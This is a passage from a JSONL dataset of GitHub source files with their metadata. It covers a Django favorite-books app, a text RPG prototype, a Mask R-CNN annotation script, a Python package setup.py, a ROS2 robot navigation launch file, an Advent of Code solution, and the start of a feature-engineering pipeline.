request.POST['useremail'])\n\tprint(\"*******\")\n\tprint(loggedInUser)\n\tprint(\"********\")\n\trequest.session['loggedInID'] = loggedInUser.id\n\treturn redirect('/book')\n\ndef add(request):\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tnewBook = Book.objects.create(title = request.POST['title'], desc = request.POST['desc'], creator = loggedInUser)\n\treturn redirect('/book')\n\ndef delete(request, bookId):\n\tbook = Book.objects.get (id = bookId)\n\tbook.delete()\n\treturn redirect('/book')\n\ndef edit(request, bookId):\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tbook = Book.objects.get (id = bookId)\n\tcontext = {\n\t'loggedUser' : loggedInUser,\n\n\t}\n\treturn redirect('edit.html', context)\n\ndef update(request, bookId):\n\tprint(request.POST)\n\tbook = Book.objects.get(id = bookId)\n\tbook.title = request.POST['title']\n\tbook.desc = request.POST['desc']\n\tbook.save()\n\treturn redirect('/book')\n\ndef display(request, bookId):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tcontext = {\n\t\t'loggedUser' : loggedInUser,\n\t\t'book': Book.objects.get(id=bookId)\n\t}\n\treturn render(request, 'showbook.html', context)\n\ndef addfavor(request, bookId):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tbook = Book.objects.get(id=bookId)\n\tbook.like.add(loggedInUser)\n\treturn redirect('/book')\n\t\ndef removefavor(request, bookId):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tbook = Book.objects.get(id=bookId)\n\tbook.like.remove(loggedInUser)\n\treturn redirect('/book')\n\ndef logout(request):\n\trequest.session.clear()\n\treturn redirect('/')","repo_name":"MoDev20/Zaki","sub_path":"favoriteBooksApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"83055538","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 14 16:44:42 2021\r\n@author: Eric Born\r\n!!! TODO !!!\r\ncreate room class which stores description text and inventory list for items \r\nto be taken by player\r\nFind_Item # looks for item of same class \r\nKilled\r\nShowDeathScreen\r\nRestart\r\n\"\"\"\r\n#import inspect\r\nimport random as rand\r\n\r\nlocation_dict: dict = {'start': ('This is the starting room, choose to inspect'\r\n ' the room by typing inspect. Move to another area by '\r\n 'typing move and the direction. Pickup an item by '\r\n 'typing pickup item name. Attack by typing attack and '\r\n 'the monsters name. Equip an item by typing equip and '\r\n 'the items name. Use an item by typing use and the '\r\n 'items name. Check your stats by typing stats.'),\r\n 'north': ('The north side of the castle, There is a '\r\n 'rusty sword lying on the ground. You can move south'),\r\n 'east': 'The east side of the castle, you can move west',\r\n 'south': 'The south side of the castle, you can move north',\r\n 'west': 'The west side of the castle, you can move to the end',\r\n 'end': 'The dragon'}\r\n\r\ndamage_type_dict: dict = {'Physical': 'physical_resistance',\r\n 'Cold': 'cold_resistance',\r\n 'Fire': 'fire_resistance',\r\n 'Lightning': 'lightning_resistance'}\r\n\r\ngame_active = True \r\n\r\nclass Location:\r\n def __init__(self, location: str):\r\n self.location = location\r\n \r\n #def Get_Description(self):\r\n \r\n\r\nclass BaseItem:\r\n\r\n # base item constructor\r\n def __init__(self, name: str, description: str, use_action: str, \r\n quantity: int):\r\n self.name = name\r\n self.description = description\r\n self.use_action = use_action\r\n self.quantity = quantity\r\n\r\n # set the items quantity\r\n def set_quantity(self, quantity):\r\n if self.quantity + quantity >= 0:\r\n self.quantity = self.quantity + quantity\r\n else:\r\n return('Invalid amount')\r\n\r\n # used to get the items quantity\r\n def get_quantity(self):\r\n return self.quantity\r\n \r\n # checks if an item is valid\r\n # def check_if_item(item):\r\n # return isinstance(item, BaseItem)\r\n \r\n def use_item(item):\r\n return()\r\n \r\nclass FoodItem(BaseItem):\r\n heal_amount: int = 5\r\n \r\n def use_item(self, player: str, item: str):\r\n # check for valid\r\n if(player and player.inventory.Find_Item(item)):\r\n player.Set_Health(self.heal_amount)\r\n else:\r\n return()\r\n\r\nclass Melee_Weapon(BaseItem):\r\n slot: str = ''\r\n weapon_type = 'Fists'\r\n equipped = 'n'\r\n damage_amount: list = [1, 3]\r\n damage_type: str = 'Physical'\r\n attack_type: str = 'Punch'\r\n hit_chance: int = 5\r\n \r\nclass Armor(BaseItem):\r\n slot: str = ''\r\n equipped = 'n'\r\n armor_type: str = ''\r\n stats: dict = {'physical_resistance': 0,\r\n 'cold_resistance': 0,\r\n 'lightning_resistance': 0,\r\n 'fire_resistance': 0}\r\n \r\n \r\n# create a weapon\r\nrusty_sword = Melee_Weapon('Rusty Sword', 'A Rusty Sword', 'Slash', 1)\r\n\r\nrusty_breastplate = Armor('Rusty Breastplate', 'A Rusty Breastplate', 'Equip', 1)\r\nrusty_breastplate.slot = 'body_armor'\r\nrusty_breastplate.stats['physical_resistance'] = 5\r\n\r\n# equip_dict = {'hand_slot_1': Melee_Weapon('Fists', 'Punching machines', 'Punch', 1),\r\n# 'hand_slot_2': 'Empty',\r\n# 'helmet': 'Empty',\r\n# 'body_armor': 'Empty',\r\n# 'gloves': 'Empty',\r\n# 'boots': 'Empty',\r\n# 'ring1': 'Empty',\r\n# 'ring2': 'Empty',\r\n# 'amulet': 'Empty'}\r\n\r\n# equip_dict[rusty_breastplate.slot] = rusty_breastplate\r\n# print(equip_dict[rusty_breastplate.slot])\r\n\r\n\r\n# if rusty_breastplate.slot in equip_dict:\r\n# print('yes')\r\n# else:\r\n# print('no')\r\n\r\n# def Equip_Item(self, item):\r\n# if self.inventory.Find_Item(item):\r\n# if item.slot in self.equip_dict:\r\n# self.equip_dict[item.slot] = item\r\n \r\n# else:\r\n# return('No slot')\r\n\r\n\r\n# class Command():\r\n# def execute():\r\n# return()\r\n \r\n# class Move(Command):\r\n \r\n\r\nclass Inventory:\r\n def __init__(self):\r\n self.item_list = []\r\n \r\n # try to add an item to the players inventory\r\n # just performs checks then performs add to inventory if successful\r\n def Try_Add_Item(self, item_to_give):\r\n if (item_to_give.get_quantity() > 0):\r\n self.Add_Item(item_to_give)\r\n else:\r\n return('Invalid item')\r\n \r\n # add the item to the players item list\r\n def Add_Item(self, item: str):\r\n new_item = item\r\n new_item.set_quantity(item.get_quantity())\r\n self.item_list.append(new_item)\r\n #return(new_item)\r\n \r\n def Remove_Item(self, item: str):\r\n if item in self.item_list:\r\n self.item_list.remove(item)\r\n \r\n # returns all inventory items\r\n def Get_Inventory(self):\r\n if len(self.item_list) > 0:\r\n for item in self.item_list:\r\n print(item.name)\r\n else:\r\n print('No items')\r\n \r\n def Find_Item(self, item: str):\r\n if len(self.item_list) > 0:\r\n for inv_item in self.item_list:\r\n if item == inv_item:\r\n print(item.name)\r\n return(inv_item)\r\n else:\r\n print('No Items')\r\n\r\nclass Player:\r\n \r\n # Create a dict with available actions?\r\n #actions: dict = {}\r\n \r\n # physical_resistance: int = 5\r\n # cold_resistance: int = 1\r\n # lightning_resistance: int = 1\r\n # fire_resistance: int = 1\r\n \r\n resistance_dict: dict = {'physical_resistance': 5,\r\n 'cold_resistance': 1,\r\n 'lightning_resistance': 1,\r\n 'fire_resistance': 1}\r\n\r\n # initialize fists as players weapon\r\n \r\n \r\n equip_dict = {'hand_slot_1': Melee_Weapon('Fists', 'Punching machines', 'Punch', 1),\r\n 'hand_slot_2': 'Empty',\r\n 'helmet': 'Empty',\r\n 'body_armor': 'Empty',\r\n 'gloves': 'Empty',\r\n 'boots': 'Empty',\r\n 'ring1': 'Empty',\r\n 'ring2': 'Empty',\r\n 'amulet': 'Empty'}\r\n \r\n # equipment = [hand_slot_1, hand_slot_2, helmet, body_armor, gloves, boots,\r\n # ring1, ring2, amulet]\r\n \r\n # set starting accuracy and evasion to 5\r\n accuracy: int = 5\r\n evasion_rating: int = 5\r\n \r\n # Player constructor\r\n def __init__(self, name: str, location: str = 'Start', health: int = 100):\r\n self.name = name\r\n self.health = health\r\n self.inventory = Inventory()\r\n self.location = location \r\n \r\n def Player_command():\r\n command = input('Please choose a command: ')\r\n # if command == 'quit':\r\n # quit_command()\r\n \r\n \r\n def Return_status(self):\r\n print('Your name is ' + str(self.name) + \r\n '\\nYour location is ' + str(self.location) + \r\n '\\nYour health is ' + str(self.Get_health())) #+\r\n # '\\nYour hunger is ' + str(self.hunger) + \r\n # '\\nYour thirst is ' + str(self.thirst))\r\n\r\n \r\n # used to move the player\r\n def Set_Location(self, location: str):\r\n if location in location_dict:\r\n self.location = location\r\n return('Moved to the ' + str(location))\r\n else:\r\n return('Invalid move')\r\n \r\n # used to find where the player currently is\r\n def Get_Location(self):\r\n return(self.location.lower())\r\n \r\n def Inspect_Room(self):\r\n print(location_dict[self.Get_Location()])\r\n \r\n # moved to inventory class\r\n # used to pick up items\r\n # def Loot_Item(self, item_to_give):\r\n # self.item_list.append(item_to_give)\r\n \r\n # kill event for the player\r\n def Killed(self, damage_event, damage_causer):\r\n print('You were killed by ' + str(damage_causer) + ' with a ' + \r\n str(damage_event))\r\n #return(\"Dead\")\r\n #ShowDeathScreen(damage_causer)\r\n \r\n # set the players health\r\n def Set_Health(self, change_amount):\r\n self.health = self.health + change_amount\r\n \r\n # !!! TODO !!!\r\n # need to find a better method for positive/negative stat changes\r\n def Set_Stats(self, direction, item):\r\n if direction == 'positive':\r\n for resistance in item.stats:\r\n self.resistance_dict[resistance] = (self.resistance_dict[resistance] + \r\n item.stats[resistance]) \r\n else:\r\n for resistance in item.stats:\r\n self.resistance_dict[resistance] = (self.resistance_dict[resistance] - \r\n item.stats[resistance]) \r\n def Get_Stats(self):\r\n for resistance in self.resistance_dict:\r\n print(self.resistance_dict[resistance])\r\n\r\n # damage the player,\r\n # takes damage event, amount and causer\r\n # sets health with negative change_amount\r\n def Take_Damage(self, damage_event, change_amount, damage_causer): \r\n \r\n self.Set_Health(-change_amount)\r\n # concat self, type of attack, amount and attacker then return\r\n damage_message = (str(self.name) + ' was hit by a ' + str(damage_event) \r\n + ' for ' + str(change_amount) + \r\n ' points of damage from ' + str(damage_causer.name) \r\n + '!')\r\n\r\n # check if lost all health, otherwise return damage message\r\n if self.health <= 0:\r\n self.Killed(damage_event, damage_causer)\r\n else: \r\n return(damage_message)\r\n\r\n # check the players health \r\n def Get_health(self):\r\n return(self.health)\r\n \r\n # use item and call remove_item\r\n def Use_Item(self, item):\r\n if self.inventory.Find_Item(item):\r\n item.use_item(self, item)\r\n self.Remove_Item(item)\r\n else:\r\n return('No item')\r\n \r\n # removes an item from the inventory item_list\r\n def Remove_Item(self, item):\r\n self.inventory.item_list.remove(item)\r\n \r\n # equip item\r\n # check if item in inventory, has a valid slot.\r\n # if already equipped, call unequip\r\n # otherwise set equip to yes, put in dict and change stats\r\n def Equip_Item(self, item):\r\n if self.inventory.Find_Item(item):\r\n if item.slot in self.equip_dict:\r\n if item.equipped == 'y':\r\n self.Unequip_Item(item)\r\n return('Unequipped item') \r\n else:\r\n self.equip_dict[item] = item\r\n self.Set_Stats('positive', item)\r\n item.equipped = 'y'\r\n else:\r\n return('No slot found')\r\n else:\r\n return('No item found')\r\n\r\n # unequip item\r\n # check if item is in equipment dictionary and is equipped\r\n # set dict to empty, subtract stats, set equipped to no\r\n def Unequip_Item(self, item):\r\n if item in self.equip_dict and item.equipped == 'y':\r\n self.equip_dict[item] = 'Empty'\r\n self.Set_Stats('negative', item)\r\n item.equipped = 'n'\r\n return('Unequipped item')\r\n else:\r\n return('No item')\r\n\r\n # check if player is hit by enemy\r\n def hit_check(self, attacker):\r\n \r\n # players evasion and resistance\r\n evade: int = self.evasion_rating\r\n res_dict: dict = self.resistance_dict\r\n \r\n # cold_res: int = attacked.resistance_dict['cold_resistance']\r\n # lightning_res: int = attacked.resistance_dict['lightning_resistance']\r\n # fire_res: int = attacked.'fire_resistance'\r\n \r\n # attackers accuracy and weapon\r\n accuracy = attacker.accuracy\r\n weapon = attacker.weapon\r\n \r\n # miss check\r\n # if random 0-99 > weapon hit chance * character accuracy, miss is true\r\n # Base chance to miss is 75%\r\n if (rand.randrange(0, 100) > \r\n rand.randrange(0, weapon.hit_chance * accuracy)):\r\n return('Miss')\r\n \r\n # if 0-evasion_rating > random 0-99, evade is true\r\n # base chance to evade is 5%\r\n elif (rand.randrange(0, evade) >\r\n rand.randrange(0, 100)):\r\n return('Evade')\r\n \r\n # if neither a miss or an evade, the hit landed\r\n else:\r\n # Calculate damage\r\n # +1 included to hit weapons cap number \r\n # since range stops 1 below the value\r\n damage_roll: int = rand.randrange(weapon.damage_amount[0],\r\n weapon.damage_amount[1] + 1)\r\n \r\n # calculate damage after resistance\r\n # damage roll - the roll multiplied by resistance for particular\r\n # weapon type\r\n damage_roll: int = damage_roll - (damage_roll * \r\n (res_dict[damage_type_dict[\r\n weapon.damage_type]] * 0.01))\r\n \r\n return(self.Take_Damage(weapon.use_action, damage_roll, attacker))\r\n \r\n \r\n # def Melee_Attack(self, weapon):\r\n # damage = self.hit_check(attacked, damage_type)\r\n\r\n\r\n# class Enemy(Player):\r\n# self.enemy_type = enemy_type\r\n\r\n\r\n\r\nTim = Player('Tim')\r\n\r\nTim.inventory.Add_Item(rusty_sword)\r\nTim.inventory.Add_Item(rusty_breastplate)\r\n\r\nTim.inventory.Get_Inventory()\r\n\r\nTim.Get_Stats()\r\n\r\nTim.Equip_Item(rusty_breastplate)\r\n\r\n# Tim.Get_Stats()\r\n\r\nTim.Unequip_Item(rusty_breastplate)\r\n\r\n# Tim.Get_Stats()\r\n\r\n# inv_test = Inventory()\r\n\r\n# inv_test.Add_Item(rusty_breastplate)\r\n\r\n# equip_dict = {'hand_slot_1': Melee_Weapon('Fists', 'Punching machines', 'Punch', 1),\r\n# 'hand_slot_2': 'Empty',\r\n# 'helmet': 'Empty',\r\n# 'body_armor': 'Empty',\r\n# 'gloves': 'Empty',\r\n# 'boots': 'Empty',\r\n# 'ring1': 'Empty',\r\n# 'ring2': 'Empty',\r\n# 'amulet': 'Empty'}\r\n \r\n# equip item\r\n# TODO\r\n# add check for already equipped\r\n\r\n# print(rusty_breastplate.slot)\r\n\r\n# test_stats = {'phys': 5}\r\n\r\n# if inv_test.Find_Item(rusty_breastplate):\r\n# if rusty_breastplate.slot in equip_dict:\r\n# if rusty_breastplate.equipped == 'y':\r\n# #Unequip_Item(rusty_breastplate)\r\n# equip_dict[rusty_breastplate.slot] = 'Empty'\r\n# #Set_Stats('negative', item)\r\n# test_stats['phys'] -= 5 \r\n# else:\r\n# #print(equip_dict[rusty_breastplate.slot])\r\n# equip_dict[rusty_breastplate.slot] = rusty_breastplate\r\n# test_stats['phys'] += 5\r\n# rusty_breastplate.equipped = 'y'\r\n# else:\r\n# print('No slot')\r\n\r\n\r\n\r\n# def Equip_Item(self, item):\r\n# if self.inventory.Find_Item(item):\r\n# if item.slot in self.equip_dict:\r\n# if item.equipped == 'y':\r\n# Unequip_Item(item) \r\n# else:\r\n# self.equip_dict[item] = item\r\n# self.Set_Stats('positive', item)\r\n# item.equipped = 'y'\r\n# else:\r\n# return('No slot')\r\n\r\n# # unequip item\r\n# def Unequip_Item(self, item):\r\n# if item in self.equip_dict:\r\n# self.equip_dict[item] = 'Empty'\r\n# self.Set_Stats('negative', item)\r\n# else:\r\n# return('No item')\r\n\r\n# Jim = Player('Jim')\r\n\r\n# Tim.Get_health()\r\n\r\n# Tim.hit_check(Jim)\r\n\r\n# #Tim.Take_Damage('Slash', -10, 'dragon')\r\n\r\n# #Tim.Take_Damage('Slash', -100, 'dragon')\r\n\r\n# Tim.Get_health()\r\n\r\n# apple = FoodItem('Apple', 'A bruised red apple', 'Eat', 1)\r\n\r\n# Tim.inventory.Try_Add_Item(apple)\r\n\r\n# Tim.inventory.Get_Inventory()\r\n\r\n# Tim.Use_Item(apple)\r\n\r\n# Tim.Inspect_Room()\r\n\r\n# Tim.Set_Location('west')\r\n\r\n\r\n# test_list = [apple, apple, 'apple']\r\n# print(test_list[0].name)\r\n\r\n# def move_player(room_selection):\r\n# print(room_text)\r\n\r\n#class commands():\r\n \r\n\r\n# while game_active: \r\n \r\n# # ask player for name or quit command, if quit, run quit_command\r\n# PLAYER_NAME = input('Please choose a name or enter \"quit\" to exit: ')\r\n \r\n# if PLAYER_NAME == 'quit':\r\n# print('Please play again soon!')\r\n# game_active = False\r\n# else:\r\n# player_controller = Player(PLAYER_NAME)\r\n# player_controller.Return_status()\r\n# print('You must journey to the final room and defeat the dragon to' \r\n# 'win the game. \\nCollect items along the way to aid you in'\r\n# 'your quest. \\nType look around to examine the room you''re'\r\n# 'in. \\nType \"quit\" to exit')\r\n \r\n# player_controller.Player_command()\r\n \r\n ","repo_name":"ericborn/RPG","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":17425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38915088539","text":"#!/usr/bin/python\nimport math\nimport rospy\nimport pickle\nimport math\nimport cv2\nimport sys\nimport os\nimport rosbag\nimport multiprocessing\nimport time\nfrom numpy.linalg import eig\nfrom os import devnull\nfrom sklearn.cluster import DBSCAN\nfrom contextlib import contextmanager, redirect_stderr, redirect_stdout\nfrom tf_bag import BagTfTransformer\nfrom scipy.spatial.transform import Rotation as R\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncombinePath = \"../data/results/lanoising\"\nmodelName = \"scans-07-05-22-16_07_18.pth\"\n\ndatasetPath = \"../data/results/maskrcnn_scans\"\ndatasetPath = \"/home/broughtong/external/broughtong/imgs/\"\noutputPath = \"../data/results/maskrcnn_scans_reprocessed\"\noutputPath = \"/home/broughtong/external/broughtong/maskrcnn_scans_reprocessed\"\ncombinedOutPath = \"../data/results/maskrcnn_scans_rectified\"\ncombinedOutPath = \"/home/broughtong/external/broughtong/maskrcnn_scans_rectified\"\n\n@contextmanager\ndef suppress_stdout_stderr():\n with open(devnull, 'w') as fnull:\n with redirect_stderr(fnull) as err, redirect_stdout(fnull) as out:\n yield (err, out)\n\nclass Converter(multiprocessing.Process):\n def __init__(self, path, filename):\n multiprocessing.Process.__init__(self)\n\n self.filename = filename\n self.path = path\n\n def run(self):\n\n print(\"Process spawned for file %s\" % (self.filename), flush = True)\n\n with open(os.path.join(datasetPath, self.filename), \"rb\") as f:\n self.data = pickle.load(f)\n #combinefn = os.path.join(combinePath, self.filename.split(\".pickle\")[0]+\".pickle\")\n #with open(combinefn, \"rb\") as f:\n # self.combinedata = pickle.load(f)\n\n self.convert()\n self.data = None\n \n os.makedirs(os.path.join(outputPath, self.path), exist_ok=True)\n with open(os.path.join(outputPath, self.path, self.filename + \".annotations\"), \"wb\") as f:\n pickle.dump(self.annotations, f, protocol=2)\n\n def convert(self):\n\n annotations = []\n for idx in range(len(self.data[0][\"boxes\"])):\n box = self.data[0][\"boxes\"][idx]\n label = self.data[0][\"labels\"][idx]\n score = self.data[0][\"scores\"][idx]\n mask = self.data[0][\"masks\"][idx]\n\n if score < 0.9:\n continue\n\n x = (float(box[1]) + float(box[3])) / 2\n y = (float(box[0]) + float(box[2])) / 2\n res = 1024\n scale = 25\n x = (x - (res/2)) / scale\n y = (y - (res/2)) / scale\n\n mask = mask[math.floor(box[1]):math.ceil(box[3]), math.floor(box[0]):math.ceil(box[2])]\n\n coords = []\n for row in range(len(mask)):\n for val in range(len(mask[row])):\n mask[row][val] = (mask[row][val])*255\n if mask[row][val] > 50:\n coords.append([row, val])\n\n cov = np.cov(np.transpose(coords))\n w, v = eig(cov)\n bigIdx = 0\n if w[1] > w[0]:\n bigIdx = 1\n ev = v[bigIdx]\n rot = -math.atan2(ev[1], ev[0])\n annotation = [x, y, rot]\n annotations.append(annotation)\n self.annotations = annotations\n\nif __name__ == \"__main__\":\n \n #extract result from network output into files\n jobs = []\n for files in os.walk(os.path.join(datasetPath, modelName)):\n for filename in files[2]:\n if filename[-7:] == \".pickle\":\n if \".annotations.\" not in filename:\n jobs.append(Converter(modelName, filename))\n print(\"Spawned %i processes\" % (len(jobs)), flush = True)\n cpuCores = 50\n limit = cpuCores\n batch = cpuCores\n for i in range(len(jobs)):\n print(\"%i frame of %i\" % (i, len(jobs)))\n if i < limit:\n jobs[i].start()\n else:\n for j in range(limit):\n try:\n jobs[j].join()\n except ValueError:\n pass\n jobs[j].close()\n limit += batch\n jobs[i].start()\n\n print(\"Jobs finished, checking them too\", flush=True)\n for job in jobs:\n try:\n job.join()\n #print(\"Job fine\", flush=True)\n except:\n #print(\"Job not fine\", flush=True)\n pass\n\n print(\"All jobs checked\", flush=True)\n\n #now we merge those detections into the original file structures\n #basically bring it into a common format\n combinableFilenames = []\n for files in os.walk(os.path.join(outputPath, modelName)):\n for filename in files[2]:\n if filename[-12:] == \".annotations\":\n combinableFilenames.append(os.path.join(files[0], filename.split(\".\")[0]))\n combinableFilenames = list(set(combinableFilenames))\n\n print(\"Combining %i files\" % (len(combinableFilenames)))\n\n for base in combinableFilenames:\n\n print(\"Combining bag\", base)\n modelPath = base.split(\"/\")[-2]\n print(modelPath)\n\n #open combinable file\n combineFile = \"\"\n for files in os.walk(combinePath):\n for filename in files[2]:\n if filename.split(\".\")[0] == base.split(\"/\")[-1]:\n subPath = files[0][len(combinePath)+1:]\n combineFile = os.path.join(subPath, filename)\n break\n\n if combineFile == \"\":\n print(\"Error combining \", filename)\n break\n\n data = []\n with open(os.path.join(combinePath, combineFile), \"rb\") as f:\n data = pickle.load(f)\n\n readyFiles = []\n for files in os.walk(outputPath):\n for filename in files[2]:\n print(filename)\n if filename[-12:] == \".annotations\":\n if filename.split(\".\")[0] == base.split(\"/\")[-1]:\n readyFiles.append(filename)\n\n print(len(readyFiles), len(data[\"ts\"]))\n #if len(readyFiles) != len(data[\"ts\"]):\n # print(\"Warning, frame mismatch\", base)\n\n data[\"maskrcnn\"] = []\n for i in range(len(data[\"scans\"])):\n data[\"maskrcnn\"].append([])\n\n #open each file, add it to the correct frame\n for filename in readyFiles:\n idx = int(filename.split(\".pickle-\")[1].split(\".\")[0])\n with open(os.path.join(outputPath, modelPath, filename), \"rb\") as f:\n annotations = pickle.load(f)\n data[\"maskrcnn\"][idx] = annotations\n \n #for i in range(len(readyFiles)):\n # if data[\"maskrcnn\"][i] == None:\n # print(\"Warning, empty frame found\")\n\n os.makedirs(os.path.join(combinedOutPath, modelPath), exist_ok=True)\n print(\"Saving to %s\" % (os.path.join(combinedOutPath, modelPath, base.split(\"/\")[-1] + \".bag.pickle\")))\n with open(os.path.join(combinedOutPath, modelPath, base.split(\"/\")[-1] + \".bag.pickle\"), \"wb\") as f:\n pickle.dump(data, f, protocol=2)\n","repo_name":"broughtong/car-detector","sub_path":"evaluation/prepare_maskrcnn.py","file_name":"prepare_maskrcnn.py","file_ext":"py","file_size_in_byte":7019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31818841692","text":"from codecs import open\nfrom os import path\n\nfrom setuptools import setup\n\nbasedir = path.abspath(path.dirname(__file__))\n\nwith open(path.join(basedir, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"macaroni\",\n version=\"0.0.3\",\n description=\"A lib to help you avoid spaghetti code\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/rudineirk/py-macaroni\",\n author=\"Rudinei Goi Roecker\",\n author_email=\"rudinei.roecker@gmail.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Libraries :: Application Frameworks\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n ],\n keywords=\"clean cleancode logic functional\",\n packages=[\"macaroni\"],\n)\n","repo_name":"rudineirk/py-macaroni","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9706761878","text":"import os\n\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription\nfrom launch.conditions import IfCondition\nfrom launch.substitutions import LaunchConfiguration\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch_ros.actions import Node\nfrom ament_index_python.packages import get_package_share_directory\n\n\ndef generate_launch_description():\n stretch_core_path = get_package_share_directory('stretch_core')\n stretch_navigation_path = get_package_share_directory('stretch_nav2')\n navigation_bringup_path = get_package_share_directory('nav2_bringup')\n \n teleop_type_param = DeclareLaunchArgument(\n 'teleop_type', default_value=\"joystick\", description=\"how to teleop ('keyboard', 'joystick' or 'none')\")\n \n use_sim_time_param = DeclareLaunchArgument(\n 'use_sim_time',\n default_value='false',\n description='Use simulation/Gazebo clock')\n\n autostart_param = DeclareLaunchArgument(\n 'autostart',\n default_value='false',\n description='Whether to autostart lifecycle nodes on launch')\n\n map_path_param = DeclareLaunchArgument(\n 'map',\n default_value=os.path.join(stretch_navigation_path,\n 'map', 'home2.yaml'),\n description='Full path to the map.yaml file to use for navigation')\n\n params_file_param = DeclareLaunchArgument(\n 'params_file',\n default_value=os.path.join(stretch_navigation_path, 'config', 'nav2_params.yaml'),\n description='Full path to the ROS2 parameters file to use for all launched nodes')\n\n rviz_param = DeclareLaunchArgument('use_rviz', default_value='true', choices=['true', 'false'])\n\n stretch_driver_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_core_path, '/launch/stretch_driver.launch.py']),\n launch_arguments={'mode': 'navigation', 'broadcast_odom_tf': 'True'}.items())\n\n rplidar_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_core_path, '/launch/rplidar.launch.py']))\n\n base_teleop_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_navigation_path, '/launch/teleop_twist.launch.py']),\n launch_arguments={'teleop_type': LaunchConfiguration('teleop_type')}.items())\n\n navigation_bringup_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_navigation_path, '/launch/bringup_launch.py']),\n launch_arguments={'use_sim_time': LaunchConfiguration('use_sim_time'), \n 'autostart': LaunchConfiguration('autostart'),\n 'map': LaunchConfiguration('map'),\n 'params_file': LaunchConfiguration('params_file'),\n 'use_rviz': LaunchConfiguration('use_rviz')}.items())\n\n rviz_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([navigation_bringup_path, '/launch/rviz_launch.py']),\n condition=IfCondition(LaunchConfiguration('use_rviz')))\n\n return LaunchDescription([\n teleop_type_param,\n use_sim_time_param,\n autostart_param,\n map_path_param,\n params_file_param,\n rviz_param,\n stretch_driver_launch,\n rplidar_launch,\n base_teleop_launch,\n navigation_bringup_launch,\n rviz_launch,\n ])\n","repo_name":"hello-robot/stretch_ros2","sub_path":"stretch_nav2/launch/navigation.launch.py","file_name":"navigation.launch.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"69"}
+{"seq_id":"33583815194","text":"infile = \"input.txt\"\n\nwith open(infile) as f:\n data = [ int(i) for i in f.read().split(\",\") ]\n\nmx = max(data)\nmn = min(data)\nfuel = float(\"inf\")\n\nfor i in range(mn, mx):\n s = 0\n for x in data:\n s += sum([x for x in range(1, abs(x - i) + 1)])\n fuel = min(fuel, s)\nprint(fuel)","repo_name":"calle2021/aoc2021","sub_path":"d7/d7_part2.py","file_name":"d7_part2.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"69828013980","text":"from feature_engineering import *\n\nclass PipelineCorrelation:\n \n \n @staticmethod\n def clean(X, y, options: dict):\n \"\"\"\n mca_keep_features_min\n min_correlation\n tree_percentage_important\n \"\"\"\n \n history = dict()\n \n # Multicolinearity\n multicolinear_columns = getMulticolinearColumns(np.abs(X.corr()), keep_features_min = options.get('mca_keep_features_min', 6))\n X = X.drop(multicolinear_columns, axis=1)\n history['multicolinear_columns'] = multicolinear_columns\n\n # Low correlation\n history['low_correlations'] = dict()\n low_correlations_labels, low_correlations_abs = getLowCorrelationsWithTarget(X, y, min_correlation=options.get('min_correlation', 0.1))\n \n history['low_correlations']['low_correlations_labels'] = low_correlations_labels\n history['low_correlations']['low_correlations_abs'] = low_correlations_abs\n \n \n X = X.drop(low_correlations_labels, axis=1)\n \n \n number_features_to_select = int(len(X.columns) * options.get('tree_percentage_important', 0.8))\n # Important features, the 80% most important\n if number_features_to_select > 0 and number_features_to_select < len(X.columns):\n features_important = getImportantFeatures(X, y, number_features_to_select, max_features = number_features_to_select)\n history['features_important'] = features_important\n X = X.loc[:,features_important]\n else:\n history['features_important'] = X.columns \n \n return X, history\n \n \n# Basic cleaning for consuming\nimport math\n\nclass PA:\n # Pipeline Actions\n DROP = 0\n TYPECAST = 1\n # SCALE = 2\n REPLACE = 3\n RENAME = 4\n REPLACE_WITH_MODE = 5\n REPLACE_WITH_MEDIAN = 6\n RENAME_LOWER_CASE = 7\n CREATE_DUMMIES = 8\n\n PIPELINE_BASE_COMMON_INT = [\n [REPLACE_WITH_MEDIAN,[np.nan]], \n [TYPECAST,np.int16],\n [RENAME_LOWER_CASE],\n ]\n\n PIPELINE_BASE_COMMON_MODE_INT = [\n [REPLACE_WITH_MODE,[np.nan]],\n [TYPECAST,np.int16],\n 